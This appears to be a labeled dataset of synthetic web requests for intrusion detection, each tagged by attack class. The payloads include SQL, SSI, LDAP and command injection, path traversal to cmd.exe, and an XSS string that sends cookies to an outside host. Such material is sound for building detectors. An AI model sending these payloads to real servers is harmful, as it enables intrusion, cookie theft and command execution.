Referer: /rtIE.wmn
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: i0mD0z http://www.io7ahygo.uk
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1380x824
Via: FTP/2.0 www.babeeOo.htm:4
Transfer-Encoding: deflate
Upgrade: Su9qj/8.6, baec/7.2
Warning: 013 22.194.211.11 "8iCne9m5iQhhsaHen19e" 
X-Forwarded-For: 136.2.161.83
X-Serial-Number: 1060683
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46276
Start - Id: 42068
class: SqlInjection
GET /swinnt.jpg?ehderieevg=OR+++++%27teasen7h%27++++LIKE+++%27Sim%25%27 HTTP/1.1
Host: www.omo9iD.it
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: emrc-a7;q=0.4, Eiideh8-umeihr;q=0.7, asotse-eice5cs
Cache-Control: min-fresh=30928
Client-ip: 18.205.184.49
Cookie: Enupln4Ie8=3hL;hihorFrinuhno=ieA;tel=9417;ennCSgel=tLsuWc
Cookie2: $Version="58"
Date: Sat, 22 Jan 05 06:00:22 CET
ETag: "tDm1Qa_PX78EH6omh9.T"
Expect: dntttuy
From: mwetzo8a@ourctd.net
If-Modified-Since: Sun, 24 Jul 05 24:55:38 GMT
If-Unmodified-Since: Fri, 28 Dec 07 19:49:29 UTC
If-Match: *
If-None-Match: *
If-Range: "53ArFZHy.hlDtssOX"
Max-Forwards: 094
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: miIioo U7Eesss=eomtuaa
Authorization: Basic YTFmZm46bmhuaWti
Range: 97-55
Referer: /3fdt/sRicRM/8otoE/eite8A.png
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: eVv6rB-PD http://www.aldl.uk
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9544x100
Via: 1.0 161.174.53.24, HTTP/2.2 www.orfEun.js
Transfer-Encoding: deflate
Upgrade: rRlEh/1.9
Warning: 537 38.107.5.37 "lwo1hwxdnein" 
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 702887096
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42068
Start - Id: 39761
class: SSI
GET /qa4haaqaAa5DePB/6oreaunrjni/nezz2o8/eIOr1zetuh0t/s4gC/tot/h77mrinsmklyxfuomyco/63651Eng_t6aF/xrecelatlw6rrrtt5G/eacsinxposn/hguqUhXnte7ha4_/eOjr.q6div.gif?qroTSrGdyTuw=bqdi%7Eo&RTiB2qG47Ow=copen3&txdapge=%3C%21--+%23include++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+--%3E&azoyswbgo=eesaeQuau+&iwoSdltenghanne=33191498&-LNzVl7mochaThttp=02&oetSaeO=o+&nph-group by-L2MU=802154 HTTP/1.0
Host: www.EA26hfid9d.be
Connection: hnolph
Accept: text/*;q=0.0, video/quicktime, audio/*;q=0.1
Accept-Charset: x-mac-arabic;q=0.4, x-mac-hebrew;q=0.4, x-mac-arabic, x-mac-greek, x-mac-icelandic;q=0.8
Accept-Encoding: deflate;q=0.0, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 39.180.8.168
Cookie: n09wf=c5rseaAnsyo;eebaazha=ftacei2t1raateesli;sfauyceetejn=Eesqi;ptWHJuidy_=55
Cookie2: $Version="565"
Date: Wed, 14 Nov 07 14:25:49 UTC
ETag: W/"UOethF6tldF.k9x"
Expect: n5nSosn=i2ymhp;hNortnNe=sseexcj
From: ls8tIstr@r3edte.de
If-Modified-Since: Mon, 07 Dec 09 24:51:59 GMT
If-Unmodified-Since: Fri, 14 Oct 05 19:19:52 UTC
If-Match: *
If-None-Match: "1n9kwriSyRlpJnM-_vg"
If-Range: Thu, 05 Jul 07 06:36:44 GMT
Max-Forwards: 6
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM bm43Z0wzMGl1dXlhZXRhZFRPM0hjYXI2dXM4ak52a3BuYVR4
Authorization: iIysS in8nbshm=hre9t
Range: 42-82,601-32,-86
Referer: http://inenrN.gov/oey7erf.tar.gz
TE: trailers,trailers,gzip;q=0.9
Trailer: Date
User-Agent: Mozilla/1.6 (Machintosh; U; PPC 0.0; ig-ev; rv:2.4.0) Gecko/65954546
UA-CPU: 68000
UA-Disp: 027,272,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5615x413
Via: 1.3 www.Qrhtldw.js, 3.1 www.3agkmt.htm
Transfer-Encoding: identity
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 306032992
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39761
Start - Id: 48004
class: XSS
GET /gc2eaevszHA/erui/ttteaaoSgia5/cYiaw/ePMnK/oohhecnothnipo6V/o86jad/Q9WdropV9WRxPOQDpw/recer1xhimaotfR/fS4w_cjJNp2g.js?eeNnwot=nney4u%29sc4%2B+h%3D%29ho%24&47Ly3H=942892&mlhhokia=eistc&odqnhooc=tlogctnedo%29&eedi4c6aalwelnu=%3Cxml++src+%3D++++%22+++++javascript%3A++++%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.naromade.com%2Fcgi-bin%2Flienmeesni.cgi%27%2Bdocument.cookie%29%3B%5D++%22%3E&aE=8x-M HTTP/1.0
Host: 100.253.250.11:02335
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 192.143.189.93
Cookie: 2oaai=imniostnsem;dZho=61818406;oOeootRo=5yi0hxmlsmceo)n7; n;6p1qaLel=234;kmTfd=&Ep
Cookie2: $Version="40"
Date: Mon, 16 Jun 08 20:42:46 GMT
ETag: "DfS8TTpUGtA_pGAA"
Expect: btagiam=frsp
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Fri, 18 Jul 08 23:49:05 UTC
If-Unmodified-Since: Tue, 26 Jan 10 20:23:14 UTC
If-Match: "u0m@qrPn4@Mtf@KRCl"
If-None-Match: *
If-Range: Fri, 23 Nov 07 17:24:10 GMT
Max-Forwards: 5523
MIME-Version: 7.4
Pragma: n8rue5e=rkie
Proxy-Authorization: NTLM YWxlQWN1ZGJ6ZG5iZXJheXRodFJidXBlRXc2N2NibXBodHVLNWVqb0g=
Authorization: Digest algorithm=sinirvd
Range: 545-32,248-,104203-4203
Referer: http://www.felxn.uk/isdtCr/lospsht/EiOsni/tdh5.mp3
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.2 (X11; U; Linux i586 9.3; ya-i2; rv:5.7.3) Gecko/75138100
UA-CPU: StrongARM
UA-Disp: 212,5646,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 948x768
Via: 4.1 www.tHyoonno.shtml:128, 0.9 www.stTtfns.shtml
Transfer-Encoding: c5Aso; ttrtmr=sOyvain
Upgrade: hrsloe/4.3
Warning: 599 www.Tcuswoi.shtml "3nnwcvtan" "Wed, 13 Dec 06 08:53:13 GMT"
X-Forwarded-For: 186.104.154.65
X-Serial-Number: 698729021
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48004
Start - Id: 42772
class: SqlInjection
POST /Re/lGTQD.Ba50VKhGV.2SM/5Ccat/2rsrefgiTtpzkaxy/h7gZpw_ca.WdZQ/sKtB2r9passthruKWQ-rso/1YtVuAv3tb9kI/m5lnnbiulr2we9Rcgo/sjS/04tQTH.dll? HTTP/1.0
Content-Length: 201
Content-Language: ito4epr
Content-Encoding: gzip
Content-Location: http://www.rhsyo.ch/4dTae.aspx
Content-MD5: ajNmcjB0YXNtZTZzNGJqZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Oct 09 06:14:06 CET
Last-Modified: Fri, 11 Nov 05 18:44:37 GMT
Host: 193.53.121.112
Connection: close
Accept: video/*;q=0.6
Accept-Charset: iso-8859-6;q=0.9, cp-932, x-mac-icelandic
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 48.186.187.130
Cookie: eerbeergeneuwwr=jgmPKc9c@;czaenu2skmedri=;   EXEC(    'INS'+'ERT     INTO  users   values(6,'Aiet1Ro1n','to'    ));ketacthmlb=8236636;oNiocaear0ynsa=~Qsock_stream
Cookie2: $Version="74"
Date: Wed, 26 Jul 06 02:55:06 GMT
ETag: "WF4A4@FXbzWEO3h-"
Expect: dpiit9td
If-Modified-Since: Sat, 21 Feb 09 02:57:22 CET
If-Unmodified-Since: Tue, 07 Dec 04 05:29:38 UTC
If-Match: *
If-None-Match: "K-IU9GQHmG9Mlwrf"
If-Range: "zuMpsrhycN9KwOzR9r32"
Max-Forwards: 0
MIME-Version: 5.1
Pragma: aix0wrs='d4Ii'
Proxy-Authorization: 1oi2hy rTepl=hneaC
Authorization: Basic a3RzbTpzN2V5bQ==
Range: 169067-0
Referer: /hfsjathl/aejy.aspx
TE: trailers,chunked;q=0.2
Trailer: Authorization
User-Agent: Mozilla/6.8 (Windows; U; WinNT 4.1; Ak-he; rv:7.8.6) Gecko/68465599
UA-CPU: PowerPC
UA-OS: FreeBSD
Via: 5.0 www.c9hhu.tiff, 9.2 53.121.42.217, 8.5 134.106.105.31
Transfer-Encoding: gzip
X-Serial-Number: 58260161
----: ----------------------------

plegh=stws/ lriframeM-38s7 ar&RhriyhttpphpGP=t&ofb=ennqiio2&PFXCT4zI=sgieii0&3cusrGiCpW14Vj=8645946&saeof9SiHerd=jnCcHnull>&fcog8oqsrar=214342&equutssfs3Z=s&YperlACMHutmJFZ=| 2&Cil0tawTw@=meWxttA

End - Id: 42772
Start - Id: 40801
class: SSI
GET /bYq/imaxsoTped/uLoeAcs9ih/sr7WkqgUF7-xT7PsoiG/Rs9SEEclibezboot.ini0-/nutdlfnmgegrt8caeee/h37fUp/VEpasswdVw1I9@0admin.asmx?4aahTot=bmhNi9ao&keiroaiqce=dKMvc2PKB&i67dtp=s-i&oshdfqklKak=nbxZ&h8uopUS=t%3Fag&svnc=u&.ri7yE0EK-FI=ltDo4eojdaaab&wrnCmlntustsr=%3C%21--++%23odbc+++connect%3D%22ks0He%2C4edie%2Cesbh%22++++++statement%3D%22select+++++*+++++from+++++ine%22--%3E&dd=tiasboeid4&na6tpnc5c=etefezh+o+u&rZopoonti=ilo&Nersteeew6=io&nlet9enpsaw8=CssucL2heeem%5D2-sRd&6psRZw=wiframeEIdrhome&sy3elrlirh5digt=wA HTTP/1.0
Host: 6.27.114.90
Connection: close
Accept: text/*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: atK7l-apa19;q=0.5, atobioyx-eiton, ele-x;q=0.2
Cache-Control: egdatd='uemso'
Client-ip: 183.101.183.29
Cookie: iiemy=y
Cookie2: $Version="225"
Date: Wed, 03 Jan 07 11:21:24 UTC
ETag: "1cLgVo.ulV29pV.b"
Expect: 100-continue
From: iiljwdi@httr81j.de
If-Modified-Since: Tue, 14 Aug 07 02:52:59 UTC
If-Unmodified-Since: Thu, 26 May 05 19:18:42 CET
If-Match: *
If-None-Match: "TRbdkbt1jx-OYQg8UH0K"
If-Range: "E44X71-TVIhDxnkCv3H"
Max-Forwards: 6552
MIME-Version: 8.4
Pragma: stcaagw=thF9Sien
Proxy-Authorization: Digest username="easT"
Authorization: Basic ZWlzd3RpOnJjVGp0bzhx
Range: 89010-,593978-8589,-17027
Referer: /mizn/n5enEte/ploI6.gz
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/5.7 (Windows; U; Win98 8.7; iO-as; rv:1.9.3) Gecko/57654365
UA-CPU: 68000
UA-Disp: 327,318,8
UA-OS: Win98
UA-Pixels: 871x928
Via: FTP/5.9 58.191.224.182
Transfer-Encoding: compress
Upgrade: tNdwlL/6.5
Warning: 985 www.atEa.jpg:824 "esoj" "Tue, 11 Nov 08 09:01:56 UTC"
X-Serial-Number: 17196143235816087076
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40801
Start - Id: 35456
class: SqlInjection
PUT /amhUMOk2FPzEY_m/Tde.htm? HTTP/1.1
Content-Length: 158
Content-Language: n,a
Content-Encoding: gzip
Content-MD5: ZXZpN2Nhbk51cm9BZTFjdA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 14 Aug 07 17:11:19 GMT
Host: 247.193.231.127:80
Connection: close
Accept: video/mpeg
Accept-Charset: iso-8859-2;q=0.7, x-mac-japanese;q=0.9, iso-8859-9, euc-cn, iso-8859-4;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-stale=7
Client-ip: 158.176.162.21
Cookie: Oimesamrt=25;isenntono4=' ) UNION   ALL SELECT 'ilGtope',841,3961,'cuo3dhtit',0    FROM    hrawusunnl   WHERE (''   = '
Date: Sun, 29 Jul 07 20:18:41 CET
ETag: "IAqNaotyPCrj4pw2"
Expect: bfTo
If-Unmodified-Since: Tue, 14 Aug 07 18:16:23 GMT
If-Match: *
Max-Forwards: 463
MIME-Version: 2.9
Pragma: no-cache
Authorization: i8ef ewqty=saxpoonp
Referer: /t5noa/o3trwq4o/nwamivie.cgi
User-Agent: kdte6sgee (iSF5SL; oPnHtXOS; h0WP5A)
Via: 3.1 131.248.126.203
Transfer-Encoding: 0ept

JTUwindow.open1dU=6274&ogdn8eN8eizr=2751383318&nv8ufl=4222&9lwcsfCvhoq=tboot.inireb&qnarm5uyh=cbPZJXnvFcX&xisipyf=4070489325&Cxtermel@=8230224&iyenemgal=raeD9

End - Id: 35456
Start - Id: 44827
class: PathTransversal
GET /Ooss/jXqzlvzXF@iNZ/dgu-9/vesos1eztiguk/botffacRFhNatelp.jpeg?ir9eredotsc7i=Ep1tEEmoafdu&ohievi=tzy7l&8iuoroaevfh0=5871505&betweenchttpsc=Ydecen3e5eiro&c5r4eeqfcoeTj=no+eievar&nJYQTO=weatgu&oer=o-JN&meeOqrtoey=%3E&E6ts6rx=9&ilhimoxpeeo=..%2F..%2F..%2Forneol%2Fadmin.txt&EbSRt=cD6JEg2_&YtTa7r=c3Xw&e1rolohiqcfmB=%40hi HTTP/1.1
Host: www.e9eettEd.biz
Connection: Maitab
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=5
Client-ip: 92.163.213.217
Cookie: tsretBb=vnPcaati4tw
Cookie2: $Version="23"
Date: Fri, 16 Feb 07 18:45:05 GMT
ETag: "7pHQPh8U0xFLR5oelO"
Expect: awtysiqo
From: eosehi@IsoiaSe.uk
If-Modified-Since: Sun, 07 Jun 09 04:15:13 CET
If-Unmodified-Since: Thu, 26 Feb 09 05:01:22 CET
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: *
If-Range: "AwNEyj99C2j5zSWS"
Max-Forwards: 7
MIME-Version: 9.8
Pragma: S=n
Proxy-Authorization: dsect8 atir0rto=aaeeis
Authorization: eH4teM jsxnoc=5ihxiqi
Range: -7,891-,-651
Referer: http://www.prmk4.st/sjql.avi
TE: trailers
Trailer: From
User-Agent: Mozilla/5.4 (compatible; sivgtd; Linux i386; pesn4a; appnao4Bne)
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 123x704
Via: HTTP/8.2 www.feet9sc.js, 1.1 www.ieoBerho.html
Transfer-Encoding: niet; toiedssh=eyswno
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 279 5.34.104.253 "ycytrdqnsuf" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 13064
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44827
Start - Id: 37281
class: LdapInjection
PUT /sCG2KTmvpho9dda/NJ.O4B4zBcat3access_logH@G/mxT1Ur/XaAJ9-2/5C@kYBTO8OHfIJDqPoF0/lmjssy/TaerRnrrpn/qmcste/pykPZLmhT7/jEscriptTRAlikeRDw1Wlocation4@/n3ykas1noImselqoescc.mdb? HTTP/1.0
Content-Length: 120
Content-Language: ru0slism,gdoatne
Content-Encoding: identity
Content-Location: /tconnttu/w8offgso.png
Content-MD5: cHJwNHdjdWVjckJtdHRPbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jul 04 16:06:40 GMT
Last-Modified: Sun, 01 Jul 07 22:21:54 CET
Host: www.rr5Lhte.de
Connection: iymIe9O
Accept: image/jpeg;q=0.4, video/mpeg, application/zip;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: bi-0irxy;q=0.6, crfIIE-hln, hMa7slq-erxutds;q=0.6, 4cgAhk-na4lu, oNYyis-Npvs;q=0.0
Cache-Control: no-transform
Client-ip: 79.167.217.81
Cookie: sSginvar=8356;PizjL=mfbh80lt5rm&ym
Cookie2: $Version="4"
Date: Sun, 12 Sep 04 03:06:10 UTC
ETag: "habrGbVuBjGHw0VnXPVY"
Expect: 100-continue
From: uAoeEcF@bauipcb2x.fr
If-Modified-Since: Fri, 22 Jun 07 04:39:29 UTC
If-Unmodified-Since: Wed, 19 Dec 07 16:44:27 CET
If-Match: "m-bNPi9tqD9qSf7vIg"
If-None-Match: "4jbDnZOHPA3X_Nem0"
If-Range: "FJhG62oiZNWFtJwvyH5"
Max-Forwards: 93
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: h0o5 os2gn=erur0
Authorization: plchry nort=njtshs
Referer: /dwinioo/turukei.ace
TE: trailers
Trailer: If-Range
User-Agent: )(  |   ( cn=*o    'brien*  )(mail =*o 'brien*    )  
UA-Disp: 2933,1211,32
UA-OS: Win98
Via: 3.2 50.250.113.169, 3.0 10.74.206.105
Warning: 883 www.fRose.tiff "esne" "Sun, 08 Jun 08 18:40:43 UTC"
X-Forwarded-For: 62.116.110.58
X-Serial-Number: 62383698375

adgAmndhndhiLw=47599&rtufyqcrnkDu=82&wget3whereY=3016432949&tbpr7dQw=60&9t2hnCceyecu=e eeMd: &SOYqekK49liwget=iNS-t4R.

End - Id: 37281
Start - Id: 48084
class: XSS
GET /e50UMOmOmZFCg-wU.jpg?hgzt=rr&lYrvgjAvizo=5&sLqnUod=horYnprLtne&accepto0v77stdinzKhttps8I=nsefertwad3d&g16e1ohat=466599&oruq3rr1Ln=%3Cdiv+++style+%3D+%22++++binding%3A++url%28%5Bhttp%3A%2F%2Fwww.ic.com%2Fscript%2FT6o.msf%5D%29%3B+%22++++%3E&esSahaut6skdi=lohttps&i8sv=8accept&sOvtoa=fRPPeqTP&0cefycsOgtri=389465&8pxtDoenisO0ha=hislereci0jn HTTP/1.0
Host: www.Vetp.com
Connection: stnven3
Accept: */*;q=0.8
Accept-Charset: windows-1252;q=0.9, iso-8859-7, windows-1254
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 220.26.106.26
Cookie: m0=1s ;V1wDS=sAeooszs;oleoersnra=wnqo5s3lu
Cookie2: $Version="5"
Date: Fri, 09 Jul 04 24:28:50 GMT
ETag: W/"d7O@30CYQD7MNCaw"
Expect: 100-continue
From: pr43lq@7remye.cz
If-Modified-Since: Tue, 25 Dec 07 17:05:34 GMT
If-Unmodified-Since: Sat, 07 Jul 07 10:37:52 CET
If-Match: *
If-None-Match: "fuoh7eEbTW7LhPidu"
If-Range: "wSeAYVlhhzoj262IJ"
Max-Forwards: 2
MIME-Version: 2.8
Pragma: 7eObe='5sx'
Proxy-Authorization: Basic bGVpbnJsaTpvb2lDbA==
Authorization: Rucfn yksNds=e8tWg
Range: -179295,540225-63
Referer: http://bay1h.fr/aoea9smq/tss0ttnt/ts3tgnft/nIriru.msf
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.1 (Windows; U; WinNT 7.1; xz-kk; rv:7.9.3) Gecko/10456971
UA-CPU: PowerPC
UA-Disp: 4437,742,16
UA-OS: Win9x
UA-Pixels: 6001x2247
Via: FTP/3.9 96.5.18.94, FTP/2.2 www.aeuowt.gif
Transfer-Encoding: identity
Upgrade: latA/6.2, lyernh/8.8, vU0s/9.0, esnis/7.5
Warning: 178 250.228.149.199:2030 "1neeqi3e" "Sat, 26 May 07 03:25:33 CET"
X-Forwarded-For: 69.186.228.89
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48084
Start - Id: 41528
class: SqlInjection
PUT /2between7BXE/dpW8FzHA1/49-N2w0phpmHW/tdlwEmZlibnfhvLy/omkcoesoeaimttAt5t/7cfAdkxCm_/WwhereNcAJrN/dKLb8_lNs/i5nz4G-S./0USbrg.PN39beQRo0smt.nsf? HTTP/1.1
Content-Length: 159
Content-Language: Tgrm,ntAeetmt,msyUT76p
Content-Encoding: identity
Content-Location: http://a1sis.fr/inMeg0t/b5tc2acs/sllfa.asmx
Content-MD5: dGFlYW4yNGdpMXdtckpvaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 21 Feb 08 22:30:42 CET
Last-Modified: Fri, 04 Jun 04 19:23:35 UTC
Host: www.trmmiLl.be
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: auehk-gdefn;q=0.5
Cache-Control: max-age=39269
Client-ip: 194.192.129.109
Cookie: pmopEeeabeA=i+ eer; [;o7eoior2=idtodilweEsOwT;samyFqeM=kitsn;i8eaniRaE=90;sSqHL.RB=sewget9rconnectoprocessing-instruction;scn1mOn5u=v tseS
Cookie2: $Version="76"
Date: Mon, 25 Apr 05 03:54:34 GMT
ETag: "jn7AlyPuFHWKaEg"
Expect: maEbbf
From: tdvdi@oee6.st
If-Modified-Since: Fri, 07 Mar 08 09:52:12 UTC
If-Unmodified-Since: Fri, 23 Jun 06 11:15:32 UTC
If-Match: "DYUrs8Juq4sgn3LTn"
If-None-Match: *
If-Range: Tue, 05 Aug 08 07:18:56 UTC
Max-Forwards: 187
MIME-Version: 0.0
Pragma: flsssyA='Mmayeipa'
Proxy-Authorization: NTLM dEU5ZGE5bXRvc1NwYVNlZXlueGFwM3RqdHRuZkJkYWRmYWI0
Authorization: NTLM aXJ5OGV2b2Vvb3JzeWlvdGFpNXJtbkVpbnM3ZUV0bGRsd29jc2RpZWF0
Range: 911566-290,4666-98
Referer: http://www.9slhex3t.com/tigde/rTdn/nsntrcdf/inpe.cgi
TE: trailers,deflate;q=0.6,trailers
Trailer: Pragma
User-Agent: Mozilla/4.0 (Machintosh; U; Mac OS X 2.4; tl-ne; rv:0.1.5) Gecko/38760228
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
Via: hxcmla/9.5 www.gisv.js, 9.8 207.0.249.91:998
Transfer-Encoding: deflate
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

psFe8=mzto&endiehx9l=8336827738&hjra0yaptq9yac=488&uWfjAea8a5a=OR 'eheosh9'    BETWEEN     'R'   AND     'T'&SsastNj9ei=daeyvrrmeallD&rab6e=a7samFt

End - Id: 41528
Start - Id: 37184
class: LdapInjection
GET /e5nnit1aeesneRRppge/oaeippi/YdaEiavStSmntsiezuy/wggq/caygt4Ert7i7sad/bZJmZR7/ituef/cx2a.w2Sp/aDJn54w4T/cCL9BR1nq0jxb7qRSx.htm?eiupdate9SL-D3=asoofurpeuop&etse0okecoertu=m4gn%26zrrltEode&rTreD=%29+++%28+%7C+%28displayName%3Dhad*%29+++%28name+++%3D+had*+++%29%28++++mail%3Dhad*+++%29&O9KUMH=lelnee+%3Bo&jKde=n26IDFQg-M&tea4Ceo8=ts3bbg12&yYGXJtelnetOrcp=612480&ZshqNo1vmE35t=5&wvoOeasu=6048708&dpautoexecoptx=soId&tdoutwg0Sitmt=tD3qPCDn&tleelhwfeo=sJE3pV&2strintNpiAo=iLS5U4KnAuZ&tf=i8wget+t HTTP/1.0
Host: 129.167.61.196:409
Connection: close
Accept: text/*;q=0.4, text/xml;q=0.9, application/*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-stale=8502
Client-ip: 70.71.99.38
Cookie: aswREeeGflOe=4etcri u :D$u:ter ercp;ot5zomusl=8etr;eeurroex=K8=;depddor9ccoCnaa= Hnl
Cookie2: $Version="2"
Date: Wed, 11 May 05 16:04:58 GMT
Expect: sgdaie
If-Modified-Since: Sat, 11 Sep 04 14:35:18 GMT
If-Unmodified-Since: Mon, 12 Dec 05 02:39:31 UTC
If-Match: *
If-None-Match: "ts9IO4T94KkfxVGe2xNl"
If-Range: Thu, 01 Jul 04 13:40:51 GMT
Max-Forwards: 503
MIME-Version: 6.5
Authorization: iai0nd 4nyszpea=dnbr
Range: 3034-,-678,-3
Referer: http://www.oaase2n.be/pgas/petmdt.mdb
TE: chunked
User-Agent: amsN (eKfhOou)
Via: 6.8 www.tkcegjIl.html, 2.9 www.tlabxmri.tiff, 5.1 186.140.77.130
Transfer-Encoding: sLeol
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37184
Start - Id: 43745
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 210.33.31.121
Connection: eoTimvhs
Accept: video/*;q=0.1, video/mpeg, application/zip;q=0.3
Accept-Charset: iso-8859-7;q=0.8, us-ascii
Accept-Encoding: identity;q=0.2, gzip;q=0.7, compress, compress
Accept-Language: eoeouAia-9hi, r5-aed1;q=0.1, rge-kxh3ectm;q=0.8
Cache-Control: only-if-cached
Client-ip: 102.44.140.215
Cookie: oGCkxW1FI=Eh2;jnsq0mhftrd=onoeedhao
Cookie2: $Version="25"
Date: Thu, 20 Nov 08 18:15:11 CET
ETag: "a4XXHLvpw1u1qBnnZ1v"
Expect: fe8gaSr=na4I2h
From: m8Lou@dteama.it
If-Modified-Since: Sun, 03 Jun 07 08:27:55 CET
If-Unmodified-Since: Wed, 24 Aug 05 23:21:03 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 19 Oct 04 05:08:13 GMT
Max-Forwards: 45
MIME-Version: 3.3
Pragma: AsrtDh='ijIuteeA'
Proxy-Authorization: naeven zndoO=eonsiuNe
Authorization: tsohq waem=Aiunlimo
Range: 24481-,44476-
Referer: /ndfeSi.ace
TE: trailers
Trailer: Accept-Language
User-Agent: essei3r4/1.6.6
UA-CPU: Sparc
UA-Disp: 903,5806,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 337x2229
Via: 1.0 www.Eutphf0.shtml:753, ean/7.0 182.255.63.183, FTP/2.6 181.231.241.123:00117
Transfer-Encoding: identity
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 960 13.127.188.120 "eVdond" 
X-Forwarded-For: 181.45.24.67
X-Serial-Number: 5495098139
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43745
Start - Id: 36462
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.1
Host: www.eeeiL.ch
Connection: keep-alive
Accept: audio/x-wav;q=0.1
Accept-Charset: x-mac-arabic
Accept-Encoding: compress;q=0.7, compress;q=0.2, identity, gzip;q=0.8, identity;q=0.1
Accept-Language: inx-usensmn;q=0.9, 9t-isiklo, 1qrse-elnig1s;q=0.8
Cache-Control: max-stale=7
Client-ip: 9.139.53.150
Cookie: teih7pNtwkvq=dJqaX_Kh;rtmrIDb1agittx=3264664;qn=rRW;dnad=n1eTe;oRLEsl9ewluren=1978958
Cookie2: $Version="0"
Date: Wed, 28 Apr 04 17:51:06 UTC
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: amnm6
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 25 Jan 04 22:15:29 GMT
If-Unmodified-Since: Sat, 31 Jul 04 24:12:45 GMT
If-Match: *
If-None-Match: "W0tPY27.5@Ee@FBfR"
If-Range: Mon, 11 Jul 05 06:34:10 GMT
Max-Forwards: 0771
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: Basic M2FwdHNvZHI6TG90YWVzTnM=
Range: 57-,410056-,436232-1281
Referer: /SEtt/nfewkoa/tlitub71.png
TE: trailers,gzip
Trailer: Accept
User-Agent: Mozilla/8.7 (Windows; U; WinNT 1.4; os-5t; rv:4.1.3) Gecko/20258399
UA-CPU: Sparc
UA-Disp: 640,8640,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 428x8640
Via: i2mes/6.4 154.201.149.205
Transfer-Encoding: deflate
Upgrade: fet/9.1, iro/2.9
Warning: 940 176.201.209.211 "dndrrAtk" "Mon, 05 Jan 04 22:49:43 CET"
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 937987877
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36462
Start - Id: 39023
class: LdapInjection
PUT /iyeeheF2ensr/ncX0kg/Seies09tuS.htm? HTTP/1.1
Content-Length: 40
Content-Language: 8so,ans
Content-Encoding: deflate
